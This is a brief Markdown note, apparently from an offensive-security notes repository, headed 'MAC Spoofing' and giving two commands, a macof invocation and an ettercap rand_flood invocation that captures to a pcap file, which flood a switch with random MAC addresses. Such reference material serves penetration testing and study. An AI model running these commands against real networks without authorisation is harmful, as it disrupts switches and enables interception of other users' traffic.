killchain-compendium/Exploits/Networks/MAC Spoofing.md

10 lines
117 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# MAC Spoofing
```sh
macof -i <interface>
```
or
```sh
ettercap -T -i <interface> -P rand_flood -q -w file.pcap
```